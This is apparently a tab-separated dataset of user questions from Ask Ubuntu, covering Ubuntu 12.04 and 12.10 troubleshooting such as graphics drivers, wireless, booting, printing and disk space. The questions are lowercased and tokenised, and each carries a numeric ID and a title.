223829	ubuntu hangs suddenly ( dell latitude e5530 )	i recently bought ( a month ago ) dell latitude e5530 which comes pre-installed with ubuntu 11.10 . i removed ubuntu 11.10 and installed 12.04 lts right after the purchase . everything worked out of box but occasionally ubuntu completely hangs . the screen freezes and i ca n't even switch to other terminals by pressing ( ctrl+alt+f* ) . whenever the screen freezes , cpu fan speed also increases . this is not happening when running particular applications . i mean it can hang without giving any reason or error displayed and while running any application . in short currently i ca n't able to reproduce system hang myself . i also want to mention that sometimes it never hangs complete day . here are the specs of my laptop : processor : core i7-3520m cpu @ 2.90ghz memory : 8gb hdd : 500gb , 7200rpm ( model=st9500423as ) graphics : intel hd 4000 operating system : ubuntu 12.04 lts ( 64-bit ) thanks !
223830	windows xp able to ping ubuntu but not vice versa	i am trying to get both my virtual machines to ping each other . my first virtual machine is running on ubuntu ( brdige connection , using a external network adapter ) ip : 192.168.1.148 , my second virtual machine is running on windows xp ( share connection with host machine nat ) ip : 192.168.15.130 . both able to access the internet . my windows xp is able to ping my ubuntu but ubuntu unable to ping xp . what could be the problem ? ps : i have shut down all firewalls etc .
223836	how can i have the terminal starting with ascii banner ?	how can i have my terminal in ubuntu starting with an ascii banner every time from default ?
223837	nvidia gpu hang problem v12.10	i have a k43s asus . intel core i3 and a nvidia graphics card 610m.2gb ubuntu apport keep telling me my gpu hangs . and i think i have a resolution problem is there anyway i could prove my resolution problem ?
223842	what is the correct way of installing boinc software ?	i 've been trying to install the boinc software ( http : //boinc.berkeley.edu/ ) , i could do it in ubuntu 12.04 but it never worked as well as in windows ( could n't get it on the systray icons , to be a startup application etc . ) , but in ubuntu 12.10 i ca n't even install it to get the interface , there 's a lot of versions and ways to install it . anyone knows the correct way for installing and using boinc in ubuntu ? thanks !
223846	is it possible to have my desktop loaded before login ?	i am connecting to the system with putty ( this is windows ssh client ) then running some service in interactive personal mode . for example this is a script to run freeswitch : dims @ nebulla : ~ $ cat freeswitch.sh # ! /bin/sh cd ~/bin/freeswitch/bin gnome-terminal -e ./freeswitch & i.e . it is installed in user directory . also display is set to :0 the problem is that i ca n't use this script until login once . script responds with dims @ nebulla : ~ $ ./freeswitch.sh dims @ nebulla : ~ $ no protocol specified failed to parse arguments : can not open display : after login , i can do `` switch user '' and see login screen but script will be able to run since desktop exists . my question is : is it possible to `` preload '' my desktop , so that initial situation was as if i loogged in and the went to switch user ?
223848	how to turn on unity hud	i have ubuntu 12.10 ( upgraded from lubuntu ) . according to synaptic , i have unity installed . how do i turn on the hud ?
223866	would upgrading from 12.04 to 12.10 break bumblebee	soo would it break my bumblebee , couse it works pretty good now ... would i have to reinstall it ?
223868	wireless does n't work on sony vaio	i have sony vaio and this is my first time running linux . i have installed ubuntu 12.10 and my wireless was working fine . just two days ago it stopped working and i do n't know why . it says i have the wireless adapter switched off . and under system settings > network > wireless my hardware address is visible . so i think it working good , but there is something wrong . how can i fix this ?
223869	accidentally formated external hard drive	today i was trying to copy some files from my external hard drive ( 1tb ) to a flash drive ( 4gb ) on ubuntu 12.10 . my flash drive contained an operating system , so i decided to format it using the disk management tool that comes with ubuntu . unfortunately i ended up formating my external hard drive , and it was mounted . i formated it to fat , and in the beginning it was ntfs . an error occurred ( since it was mounted ) and the label on the hard drive vanished , but i could still copy files from and to it . in the disk management tool the partition appeared as “unknown” . when i saw the label was gone and that the partition was acknowledged as unknown , i knew that probably my computer would n't be able to recognize my hard drive partition once i disconnect it from my computer . unfortunately i did n't have enough space to save all data from the hard drive to the computer it was connected to , so i did had to remove the hard drive to another computer : and what i expected happen – my partition is no longer recognized by ubuntu . since i was able to copy files between the computer and the hard drive ( i actually copied the files i wanted to my flash drive ) before i remove it from my computer , i think there may be a way to recover my partition to its original state , and that 's why i am creating this question . i have some data on the hard drive i really need and that i do n't have anywhere else . any help would be appreciated .
223870	can not install ubuntu 12.04 or 12.10 on toshiba qosmio x870	i have a new toshiba qosmio x870 and for the past one week i have been trying to install ubuntu 12.04 from a usb and live cd without success . i keep on getting this error : boot failure : a proper digital signature was not found . one or more files on the selected boot device was rejected by the secure boot feature . i even tried installing ubuntu with the windows installer . after installation and i reboot the pc , first i see the error that points to : \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : the os could n't be loaded because a required file is missing or contains errors . when i restart , that the previous error does n't show up and i see both windows 8 and ubuntu ( happy that i was successful ) but when i click on ubuntu , it flags an error . this is the first time i 'm having a secure boot-capable pc . what will be the danger in disabling the secure boot ? i 'll be happy if i can get assistance from anyone .
223877	virtual usb bus using tcp	i have a router that a printer can be attached to to print wirelessly to . it appears that the software for windows uses a virtual usb bus using tcp . this allows the printer to appear as if it was plugged directly into the computer . is it possible to create a virtual usb bus using tcp on ubuntu or is this a custom protocol used by the router and windows software ?
223879	is wireless ltsp possible ?	background : i 've been doing research into ltsp , to see if it would be a viable option for my school . however , ( almost ) everything i 've found say that wireless ltsp is n't possible . this is a problem since my school almost exclusively uses apple laptops . question : having every classroom wire its laptops into the network is unrealistic , so is there a way to have clients wirelessly boot into the ltsp server ?
223880	screen resolution very low in tty with nvidia driver	i have this machine with a 1080p hd screen with a nvidia gforce gts250 card and i just installed ubuntu server 12.10 . after the first boot the grub screen was in a wrong resolution , 1280x720 . however after booting the tty was perfect , 1920x1080 . then i did : sudo apt-get install nvidia-current xserver-xorg fluxbox sudo reboot the screen resolution of grub did n't changed . however the resolution of the tty is now 640x480 until i do : startx that gets me into fluxbox and the resolution is 1920x1080 . any ideas on how to fix the resolution of the tty and , if possible but less important , the grub screen ?
223882	how do i save the settings on a ubuntu live usb ?	i made a bootable usb pendrive which works just like a live cd . when i use it and make changes , for example , install an application , it does not save the changes i make on next reboot . is it possible to do something about this ? update : i have followed the instructions in kingmilo 's comment . eventually , i ended up using `` startup disk creater '' . which is a great application . i decided to give 2.6 g as storage ... .but i faced the following problem : basically , i start up with the `` try ubuntu '' options ... and everything gets saved ( applications , wallpaper , music ) , but i need the extra space to work . how can i make it work in the easiest way ? update2 it is working now with kingmilo 's help/comment and some other info on properly partitioning and formatting pendrives .
223883	ubuntu xubuntu lubuntu 12.10 and compiz compostor	where can i find the compiz compositor and the plug-ins that will work in 12.10 all versions i see the https : //help.ubuntu.com/community/compositemanager # compiz article but it has no mention of anything beyond 12.04
223892	adding ip address to openvz vps ( openvz web panel )	i apologise if i sound at all dumb . this is my first dedicated server having used a vps for over a year and i 'm trying to setup a vps on this new server . i purchased a subnet from my hosting provider that i believe allows me 6 usable ip addresses : 177.xx.xxx.201 - 177.xx.xxx.206 the subnet address looks like this : 177.xx.xxx.200/29 . i 've gone on my server and added them like it said on a wiki like so : ip addr add 177.** . ***.201/29 dev eth0 i done that for all six and now when i go to them in the browser they point to my server . the problem is , i 'm using openvz web panel to create vms ( http : //code.google.com/p/ovz-web-panel/ ) so i created a vm and assigned one of those ips to it . however when sshing to that ip it ssh 's to the dedicated server and not the vm . am i missing something ?
223897	how well is the thinkpad internal microphone supported ? ( x230 )	specs say it 's an internal digital stereo microphone . windows does have an option to switch between conference and singleuser mode , like most voice recorders with stereo mics . is this option hardware or software based ? what kind of signal does ubuntu receive from the stereomic ? mono or stereo ? is it possible to use this conference/singleuser option ? it 's a really nice feature and it would be a tragedy if ubuntu wouldnt support it .
223898	why is lubuntu 12.10 using all cpu ?	i want to install lubuntu on a pentium iv desktop with 1gb ram and i am currently trying it on live-mode from a pendrive , just to be sure this wo n't give me trouble after proper installation to hdd , why is cpu usage permanently at 100 % in task manager , even when in idle state ? the system is not running slowly , so i do n't understand why is this happening . top - 15:30:56 up 17 min , 8 users , load average : 1,10 , 1,20 , 0,87 tasks : 125 total , 1 running , 124 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 10,3 us , 4,5 sy , 0,0 ni , 3,3 id , 81,9 wa , 0,0 hi , 0,0 si , 0,0 st kib mem : 1018100 total , 909352 used , 108748 free , 106504 buffers kib swap : 0 total , 0 used , 0 free , 501836 cached pid user pr ni virt res shr s % cpu % mem time+ command 1882 root 20 0 80656 11m 7028 s 6,1 1,2 0:22.74 xorg 3460 lubuntu 20 0 172m 12m 9580 s 6,1 1,3 0:00.31 lxterminal 3512 lubuntu 20 0 5452 1280 972 r 6,1 0,1 0:00.01 top 1 root 20 0 3632 1996 1276 s 0,0 0,2 0:00.80 init 2 root 20 0 0 0 0 s 0,0 0,0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0,0 0,0 0:01.10 ksoftirqd/0 6 root rt 0 0 0 0 s 0,0 0,0 0:00.00 migration/0 7 root rt 0 0 0 0 s 0,0 0,0 0:00.21 watchdog/0
223900	why has wireless disappeared after my 12.10 upgrade ?	i just upgraded to 12.10 on my lenovo b570 laptop . networkmanager is n't displaying a submenu for wireless connections at all , even though i downloaded the update through the wireless connection . this displeases me . stuff i 've tried includes : $ sudo modprobe wl fatal : module wl not found . $ sudo lspci -nn | grep `` bcm '' 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) $ rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no eta : linux-headers-generic is already the newest version , and what i get when reinstalling bcmwl-kernel-source includes the following , near the end . dkms : install completed . error : module b43 does not exist in /proc/modules error : module b43legacy does not exist in /proc/modules error : module ssb does not exist in /proc/modules error : module bcm43xx does not exist in /proc/modules error : module brcm80211 does not exist in /proc/modules error : module brcmfmac does not exist in /proc/modules error : module brcmsmac does not exist in /proc/modules error : module bcma does not exist in /proc/modules fatal : module wl not found . eta2 : solved ! turned out the problem was that i 'd been running the 3.0 kernel instead of 3.5 -- meaning the seeds of this problem have been lurking around for at least half a year . chili555 's answer helped me discover this , though it took a little longer to find out how to boot to 3.5 .
223902	hdmi and dvi problems in ubuntu 12.04	i hope someone can help ! i bought a brand new computer ( intel® pentium ( r ) cpu g2120 @ 3.10ghz × 2 with intel® ivybridge desktop graphics ) , running ubuntu 12.10 . the graphics card has both vga and hdmi output . my problem is that i can not connect to my dell monitor with only the hdmi cable . the hdmi cable goes through 'n dvi adapter into the dell monitor . all the cable work , because last night i connected to the monitor using the hdmi via my dell laptop ( also running ubuntu 12.10 ) . i have both the vga and the hdmi plugged in simultaneously in my desktop , but this was not neccesary with my laptop . as soon as i plug the hdmi in , something happens in the monitor . as soon as i unplug the vga , i have no signal . i just installed mesa utils and that helped ubuntu to detect the graphics , but it did not solve my problems . hope i explained enough/thoroughly ?
223912	i can not install skype on ubuntu 12.10	i ca n't install skype on ubuntu 12.10 , i need your help . this is the error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin but it is not installable e : unable to correct problems , you have held broken packages . so ?
223914	launcher problem after installing the nvidia driver	i am using ubuntu 12.10 and unity as my desktop . recently i installed the nvidia driver using the package nvidia-current-updates but after that , when i move my mouse to the left side of the screen the launcher bar wo n't show up , what should i do ? ?
223918	connecting to windows home network printer	i have a brother mfc 5440cn connected to my windows vista desktop which is shared with the workgroup . i have figured out how to go to the printers application and find the shared printer . however , no driver is listed for my specific printer , although there are drivers for other brother mfc printers . i tried downloading from the brother website but do n't know which to choose and how to install . how do i install the correct drivers for my printer ? thank you .
223924	get downloadable applications that can open a specific file type	i 'm trying to create a custom `` open with '' dialog that allows the user to open a file with a not-yet-installed application . in ubuntu , is it possible to obtain a list of programs that can be used to open a file ? i need to find a list of downloadable programs ( instead of installed programs ) that can open a file , from the command line .
223925	using apt-get from canada	i am using ubuntu server 12.04 lts , and until yesterday , everything was quite peachy . i have installed several packages ( mysql , apache2 ) and to my knowledge have those configured correctly . upon configuration of phpmyadmin , i found that i was missing the directory path /etc/phpmyadmin , which got me thinking about the install . i am new to ubuntu , so i guess i missed the message telling me that i did not download phpmyadmin successfully . anyway , trying to use apt-get yesterday/today results in `` failed to fetch ... '' messages , even if just to run sudo apt-get update . some notable details : ···no gui , command line only ( sudo apt-get gksu fails , go figure ) ···can ping 4.2.2.2 , so i know the internet is out there ( somewhere ) ···this is a dedicated computer , using samba to share files with windows , which does work ···attempted to edit my /sources.list file , for various american/canadian mirror , to no effect ···ensured i have correct dns settings in /etc/networks/interfaces i 'm not sure where along the way it happened , but i seem to have lost connections to repositories ... : ) any advice ( including go back to windows ) is appreciated . edit : fixed by adding an actual nameserver to /etc/resolv.conf
223928	ubuntu stops using nvidia driver after kernel upgrade	just updated and restarted , ubuntu 's does n't display correctly . after restart , the desktop now looks like this . i 've temporarily switched to the nouveau driver . the update history reveals the kernel was updated , amongst many things ; and the following were installed : linux-image-3.5.0-19-generic ( 3.5.0-19.30 ) linux-image-extra-3.5.0-19-generic ( 3.5.0-19.30 ) i 've encountered this type of problem quite recently , so i decided to reapply the same steps , to solve the problem , as follows : sudo apt-get install linux-headers-3.5.0-19 sudo apt-get install linux-headers-3.5.0-19-generic sudo depmod -a sudo modprobe nvidia sudo /etc/init.d/*dm restart when installing linux-headers-3.5.0-19-generic , i get an error , message from terminal as follows : setting up linux-headers-3.5.0-19-generic ( 3.5.0-19.30 ) ... examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.5.0-19-generic /boot/vmlinuz-3.5.0-19-generic error ! problems with depmod detected . automatically uninstalling this module . dkms : install failed ( depmod problems ) . module rolled back to built state . however , i ignored the above error and continued the steps with sudo depmod -a , re-installed nvidia-current ( because it was removed when activating nouveau driver ) , then did sudo modprobe nvidia , which yielded the following error : fatal : error inserting nvidia_current ( /lib/modules/3.5.0-19-generic/updates/dkms/nvidia_current.ko ) : no such device update : upon restart , the nvidia driver now works ! btw , do those error messages imply i broke something ; am i on the right track ? just curious , cause i do n't want to get happy i 've fixed it , then it stops working later on . finally , how can i prevent this from happening in future ? the system is dell xps-l702x , with nvidia geforce gt 555m , and 17 '' screen .
223932	where did my free space go ?	i have a storage drive ( 2tb ) and an os drive ( 90gb ssd ) . i 've run out of space on the os drive : / $ df -h filesystem size used avail use % mounted on /dev/sdb1 72g 72g 0 100 % / udev 5.9g 12k 5.9g 1 % /dev tmpfs 2.4g 1.2m 2.4g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 5.9g 428k 5.9g 1 % /run/shm /dev/sda1 1.9t 639g 1.2t 37 % /media/storagedrive so be it . but when i attempt to figure out where the space has gone , i can not find it anything remotely approaching the capacity of the drive : / $ sudo du -h -d 1 du : can not access `./media/storagedrive/home/ari/.gvfs ' : permission denied 675g ./media 2.3g ./var 0 ./proc 7.0m ./tmp 27m ./boot 4.0k ./lib64 12k ./dev 44m ./home 16k ./lost+found 8.0m ./sbin 223m ./lib 4.0k ./selinux 1.4m ./run 140k ./root 8.8m ./bin 4.0k ./mnt 38m ./etc 8.0k ./srv 4.8g ./usr 65m ./opt 0 ./sys 682g . note the difference between the total ( 682g ) and the mounted drives in /media ( 675g ) is only about 9g . how are 72g being used ? where is this dark matter hiding ?
223933	how do i resolve `` no json object could be decoded '' on mythbuntu live cd ?	i have been running a mythtv frontend on my laptop for some time against a mythtv backend installed in linux mint 12 on another computer , and everything works fine . now , i 'm trying out the mythbuntu live cd ( 12.04.1 32-bit ) on the laptop , to turn it into a dedicated front end . it 's connecting to the network just fine , and i can see my server . when i click on the frontend icon on the desktop , it asks me for the security code , which i 've verified against mythtv-setup on the server . however , when i test that code , it shows the error message `` no json object could be decoded '' . i 've looked in the control center to see if there 's something else i should be setting up . the message above implies to me that it ca n't find the server , but i can find no place in the control center to tell it where to find my myth backend , which i find a little odd . does the live cd not work against a backend server on another machine ?
223939	why gnome is not taking the all height of the screen	i 'm using gnome-shell on ubuntu 12.10 after restart everything was working ok now my screen looks like this also i ca n't right click on my desktop . any thoughts ? have no idea about what happen .
223942	unity 12.10 menu - prevent hiding	is there a way to prevent the menu of an app ( e.g . gedit ) from hiding when it loses focus ? i would prefer that it stay visible all the time . thanks .
223943	ubuntu boot error	ubuntu 11.04 after failed try of installing windows on same machine , ubuntu does n't boot . grub starts well , but when i try to choose ubuntu only `` killed '' message appears on the top left corner . if i try to boot using live cd , after i choose `` boot without install '' something like `` kernel panic '' message appears and so i can only reboot . samsung r525
223944	how to automatically restart tomcat7 on system reboots ?	i have installed tomcat 7 on ubuntu 12.04 lts which run on an amzon ec2 instance . now i wish tomcat should restart automatically on system reboot . i read this blog which suggest adding below script to /etc/init.d/tomcat7 # tomcat auto-start # # description : auto-starts tomcat # processname : tomcat # pidfile : /var/run/tomcat.pid case $ 1 in start ) sh /usr/share/tomcat7/bin/startup.sh ; ; stop ) sh /usr/share/tomcat7/bin/shutdown.sh ; ; restart ) sh /usr/share/tomcat7/bin/shutdown.sh sh /usr/share/tomcat7/bin/startup.sh ; ; esac exit 0 and issue the following commands sudo chmod 755 /etc/init.d/tomcat7 sudo ln -s /etc/init.d/tomcat7 /etc/rc1.d/k99tomcat sudo ln -s /etc/init.d/tomcat7 /etc/rc2.d/s99tomcat sudo /etc/init.d/tomcat7 restart my questions the tomcat7 already has script in it , where do we have to paste the suggested script ? is the suggested procedure correct ?
223947	remove android os from toshiba tablet at105 and boot as ubuntu	is it possible to completely remove android os from toshiba tablet at105 and boot it as ubuntu ?
223955	failure of lan driver on ubuntu 12.10 installed on toshiba satelite c850-p5010	i bought a new laptop toshiba satelite c850-p5010.after installing ubuntu 12.10 , failed to connect to internet using an external modem . i connected the modem ( beetel 110tc1 ) to the lan port the pc led indicator just went off . ( no connectivity problem on windows 7 ) .the network icon on the top panal shows no network connection . sysinfo displays the network controller as : realtek semiconductor co. , ltd.device8723 and subsystem : 'realtek semiconductor co. , ltd.device 0723 ethernet controller : atheros communications device 1090 ( rev 10 ) and subsystem : toshiba america info systems device ff1e when i ran lspci in a terminal the result displayed was : 01:00.0 ethernet controller : atheros communications inc. ar8162 fast ethernet ( rev 10 ) 02:00.0 network controller : realtek semiconductor co. , ltd. device 8723 i tried the solution given for `` installing driver for ar8161 on an offline machine '' , but failed . how can i install driver for ar8162 on my lap ?
223956	how can i build aura wm from chrome os in ubuntu ?	i saw the omg ! ubuntu article on installing chromeos on top of ubuntu . i liked the window manager , aura , and want to add it along with unity without the chromeos version active ( to get ubuntu applications and hdd data ) . is there an ubuntu version of this wm to use in native ubuntu ? if not , how do i get source code to compile it in ubuntu ? ( i know this would be extremely unstable , most probably wo n't work , but why not try ? ) i use 12.04 64bit , got 8gb ram . what i want : - aura login : actual look :
223957	bootmgr missing no disc . please help noobie here !	i was running ubuntu dual boot and wanted to remove windows altogether . ubuntu was installed on my pc not on disc . i then used os uninstaller to get rid of windows . ubuntu is still in there somwhere , but after reboot i just get bootmgr missing message . i have no windows disc at hand till monday and only my phone for internet . any way around this at all ? please help . system is mainly asus , i think . i know there is an ezflash option that appears at reboot ... lost here lol : - ) maya
223960	ubuntu one app installation `` waiting '' on ipad	i would like to install the ubuntu one app on my ipad . when i choose `` install '' in the app store , the ubuntu one icon appears on my screen with a progress bar and the message `` waiting . '' and it stays like that . i 've tried removing it and restarting the installation and i get the same problem .
223970	amd legacy driver in 12.10	i 've done a fresh install of ubuntu 12.10 on my machine which has an amd4890 video card . as i have come to find out , legacy card drivers no longer work with xorg in 12.10 . i have found many recommendations for this procedure : https : //launchpad.net/~makson96/+archive/fglrx however , when i follow this step by step , i still get no unity after the reboot .
223971	install ubuntu to hard disk without overwriting mbr ?	what 's the best way to install ubuntu without putting grub on the mbr ? i would think i can install to another partition ( logical ? ) , and then install grub on a bootable usb . when i want to boot to ubuntu , just plug in the usb . would this work ? how can i get the installer to do that ?
223972	cant see the desktop except for the background ubuntu 12.10	this happened after i reinstalled the fglrx graphic drivers . is this a problem with unity or compiz ?
223973	how can a resolve issues relating to autosave , multiple instances , launcher and errors in libreoffice ?	recently i have had problems with my libreoffice on ubuntu 12.10 . it does not seem to save changes in documents frequently and depending on what file i open 2 libreoffices will be running and one of the icons will be where i put it and the other one very far down in the launcher . i suspect that they interfere with eachother in some way . also , if i then restart my computer - libreoffice and librecalculate will be gone from the side panel and i have to get them from the `` home '' folder again . i have tried to uninstall them and install again but there is no change . i typed in libreoffice in the terminal and got this : javaldx : could not find a java runtime environment ! please ensure that a jvm and the package libreoffice-java-common is installed . if it is already installed then try removing ~/.libreoffice/3/user/config/javasettings_linux_*.xml warning : failed to read path from javaldx
223975	ubuntu compatibility with wacom tablet cth-461	i just recently learned about the existence of ubuntu , as i am considering purchasing a netbook with this operating system installed . i have been reading up about it all week now , but as i 'm not at all familiar with all technical terms , it 's a bit much . what i really wanted to know is if i can use my wacom bamboo cth-461 with ubuntu 12.04 , and an easy explanation of how to install it , and if some script has to be run , or drivers downloaded , specifically how and where . also , i would be interested to know if photoshop is installable ( and if so , grade of difficulty ) .
223978	iso booting with grub2 in ubuntu on an apple	i have ubuntu with grub2 installed in an apple macbook pro with dual boot ( using refit ) , and i would like to use grub2 to boot the livecd iso image of a system based in debian too ( crunchbang ) . the iso image is saved in the same hard disk , same partition as ubuntu . i can easily boot many other livecd iso images , but i can not boot this one , and i can not boot the macos system , from the grub menu , either . the installation of ubuntu left a couple of menu entries to boot macos , but they never worked . so i do n't know if it is possible to boot them , and how . i have tried many options , but the menuentry i am trying now to boot crunchbang is this one : menuentry `` crunchbang-10-20120207-i386.iso '' { set isofile= '' /home/user/desktop/iso/crunchbang-10-20120207-i386.iso '' loopback loop ( hd0,3 ) $ isofile linux ( loop ) /live/vmlinuz1 iso-scan/filename= $ isofile toram=filesystem.squashfs findiso= $ isofile boot=live config -- initrd ( loop ) /live/initrd1.img } and i copied it from here : http : //linux4netbook.blogspot.com.es/2012/08/due-crunchbang-e-un-pennino.html ... ... ... . coteyr and akurczyk : i am already using refit . akurczyk : i do n't have a separate /home partition and do n't understand what you say .
223985	openshot video/audio preview has no sound	im trying to edit some videos in openshot but there 's no sound in the preview window . sound works when i play the videos on vlc however . the videos play with melt but they also have no sound . im running ubuntu 12.10 . spent a good two hours on google searching for a solution with no results yet .
223986	custom keyboard shortcuts in gedit	since i spend a lot of time on my laptop , i 've gotten used to using keyboard shortcuts for everything . i want to be able to switch from tab to tab of opened documents in gedit by pressing ctrl+tab and ctrl+shift+tab . are there config files i can edit or something else i can do to enable this functionality ? alternatively , can anyone post a lits of keyboard shortcuts in gedit ?
223995	how to install .tar.bz2	i have downloaded wine using the download location at the site . the download is a file.tar.bz2 . i have extracted it and it gives me a lot of files but nothing that seems to be executable . how can i install it without using the software center ?
224001	list programs in the ubuntu software center by file association	in ubuntu , is there any way to obtain a list of file associations for applications that have n't yet been installed ? i 'd like to find the files that a not-yet-installed software application ( e.g . google-chrome or firefox ) can open . i currently do n't know of any feature in the ubuntu software center ( or another application ) that can list the filetypes associated with a specific application - does such a feature exist ?
224004	how to add programs to the launcher ?	how can i add new programs to the launcher in ubuntu ?
224005	how to restore totally messed up graphic issues	some weeks ago , i tried to install nvidia drivers from their web-page . ( lesson learned , it 's a big mistake ) then i have ended up totally broken system . ( in terms of graphics ) currently my unity has problem as exactly as described here ; unity does n't load , no launcher , no dash appears however none of the solutions there did n't help me . for weeks , i have been trying many things mentioned including both here or ubuntu forums , but still no luck . i 'm currently running gnome-shell on the same system , and it is pretty working , but i could n't get my unity back . i have tried complete reinstall of nvidia drivers and nouveau drivers . as well as complete reinstall of unity , compiz etc . i do n't know how to trace the problem , but i guess it is a driver issue since lspci ca n't detect my kernel module . full lspci -k output : http : //paste.ubuntu.com/1400462/ i have tried to enable nvidia drivers using text-jockey . it did n't help either . here is the output of text-jockey -l : http : //paste.ubuntu.com/1400473/ also , unity support utility shows this output ; 22:21 laptop ~ $ /usr/lib/nux/unity_support_test -p error : glx is not available on the system when i ran unity -- replace i get bunch of errors , ( unity -- reset says the command is deprecated ) the output is here : http : //paste.ubuntu.com/1400481/ i 'm running ubuntu 12.10 , my graphic card is nvidia geforce 630m . these are the logs all i can collect . i need a way to re-install graphic drivers ( nouveau or proprietary , does n't matter at this point ) to get my unity back . any help , or ideas would be appreciated . thanks in advence .
224006	resetting xfce panels to default settings ?	how do i reset my xfce panels to the default settings that xubuntu uses ?
224007	how do i add printers from a windows print server	i am installing ubuntu 12.10 in a windows environment . currently , all of our printers are served . for instance , our main printer is on \sst-dc5\copier . i am trying to figure out how to add these printers to ubuntu . i do n't want to create a print server , and i do n't want to allow windows users to print to me . that seems to be 99 % of the answers i am finding . any help would be appreciated . thank you
224008	proxy client for ubuntu	i want to use a proxy for web browsing similar to ultrasurf for windows . i 've tried to use tor , but it is n't working ! the problem is whenever i search something along the lines of `` ubuntu + linux proxy '' , sites assume that i want to set up a proxy server rather than use one . i just want something with little to no configuration needed ( i.e . i do n't have my own proxy server ) . ultrasurf is a free software which enables users inside countries with heavy internet censorship to visit any public web sites in the world safely and freely . users in countries without internet censorship also use it to protect their internet privacy and security .
224012	why is the login section of `` passwords and keys '' empty	where are passwords stored for the user . as a test i deleted the files stored in /home/user/.gnome2/keyrings expecting to have to re-enter my wifi password at least but it had no effect . so where are passwords stored in 12.10 ?
224017	changing the default program for an application	i have installed monodevelop and after that wine , but when i want to open an exe file and then double click on it , it always runs with the mono runtime , and if i want to run it with wine , i should right click on it and choose wine . well , in properties and in show other applications there is n't wine that choose it for the default application ... i have this problem for all types of applications and files . when the software you want to run is in the right click application ( open with ) , i ca n't choose it in properties for the default . in fact , i ca n't find it in properties , because it is in open with option in right click ... what should i do to fix this problem ? i 'm running ubuntu 12.10 ( quantal quetzal ) , 32 bit .
224019	help connecting to windows shares on 2003/2008 server ubuntu 12.04	can anyone help me , i 'm really struggling to connect to windows shares via nautilus using the connect to server command - anyone know the correct syntax to use for user names and domain names or work groups ? its driving me nuts , i would fully use ubuntu for work if i could make it connect to my windows 2003/2008/ windows 7 shares/ file servers seamlessly . how do you do it ? i have been googling my a $ % s off but ca n't work it out i have no issues with ssh or ftp
224030	ubuntu one not working on ubuntu gnome remix 12.10	i 'm trying ubuntu 12.10 gnome remix . how can i install u1 on it ? it is possible ?
224036	using x264 win binary in ubuntu	i like to work with standalone cli binaries whether .jar or .exe standalone .jar clis like pdfbox by apache is cross platform & can be use in win & *nix similarly , however ... i currently use x264_32_tmod-8bit-all-libav.exe standalone .exe but i ca n't use this under ubuntu , so is there any standalone cli executable .bin available for ubuntu which can be used via terminal . all tutorials refer to handbrake & ffmpeg compiling but i am more comfortable with x264 syntax
224040	ubuntu 12.10 64 bits not booting on a dell inspiron 15z puissance ( french ) in uefi mode	when trying to start ubuntu from my usb key in uefi mode ( it works in legacy mode , but i have to keep windows ) on a dell inspiron 15z , grub starts , but when i choose any option , i get a black screen and my usb key stop teling me it is being read . edit : when using the legacy mode and trying to install ubuntu , i get a blank partition table with ubiquity… … and a very strange partition table from gparted ( i have a hybrid 32go ssd + 500go hdd disk ) :
224043	how to move ubuntu 12.04 on another drive	how i can move my ubuntu on another drive ? i know about clonezilla but problem is that destination drive is smaller the source one . gparted ca n't copy-paste partition if destination not the end last partition . i tried dpkg -- selected-packages and apt-clone . first one just not install all my packages and removed existed that now i have no full unity and not my all packages . second one just fail on configuration package . but before i did that way i copy-paste my /etc to the new system . my partition table : destination : gpt 1 1049kb 106mb 105mb fat32 efi system загрузочный 2 106mb 12,1gb 12,0gb ext4 3 12,1gb 66,3gb 54,2gb ext4 source : msdos 1 1049kb 12,0gb 12,0gb primary ext4 загрузочный 2 12,0gb 492gb 480gb primary ext4 3 492gb 500gb 8107mb primary linux-swap ( v1 ) gpt not working with ubuntu that use grub 1.99 . i do n't know why but my laptop ca n't boot any device with uefi , just black screen and ubuntu detect it on fresh install .
224044	can not install ubuntu 12.04 using wubi	i recently installed windows 7 on my pc and i have been unsuccessfully trying to install ubuntu 12.04 on it . i used to have dual boot system before both with windows and linux . i changed my hard drive from ide to ahci ( default option ) burned the ubuntu cd properly ( not the .iso file ) using the ubuntu 12.04 distribution i downloaded from the official site , set boot priority to cd/dvd but.. nothing . it tries to boot from the cd , does n't manage and turn to boot from the hard drive . i also tried wubi . i opened it through windows , got the window that asks me to choose `` demo and installation '' or `` more on ubuntu '' ( something like that ) , i choose the first option , reboot manually my computer and it keeps returning on windows mode and does n't boot from the cd . what can i do ? thanks !
224047	reading cpu temperature intel celeron ( r ) with lm-sensors	i know there are already a lot of questions like this , but non of the answers provided there could fix my problem . i try to read out my cpu temperature with lm-sensors on my ubuntu 10.04 lts installation but i ca n't get to work . i did try the command sensors-detect several times but still nothing . my computer is an old pc with an intel celeron ( r ) @ 2.60 ghz . the odd thing is that the hdd temp is shown in the applet but when i type in the terminal sensors i get the error : `` no sensors found ! make sure you loaded all the kernel drivers you need . '' i 'm not really interested in the hdd temperature but i think it is strange that these sensors do work in the applet and not in the terminal . this is the output that sensors-detect gives : http : //pastebin.com/f4hvkalu any suggestions ?
224049	why have column borders gone missing in rhythmbox gui ?	my theme does n't use shading , only borders and outlines . before : since a few weeks ago , rhythmbox has stopped drawing all borders so that i ca n't see columns or sections very well . after : even my scrollbars are not being drawn correctly . this makes the gui really hard to use . when i change themes it seems that rhythmbox has changed its gui to use only shading to delineate sections , tabs , columns , etc.. rhythmbox seems to be the only program that has this problem so i 'm guessing this is a rhythmbox thing , but not sure . my theme is not updated for gtk 3.6 . maybe that is the issue ? anyone know what 's going on ?
224050	changing another user 's wallpaper	is there anyway to change the wallpaper of another user ? i believe a missing wallpaper file is preventing me from logging in to an account , and need to be able to change it .
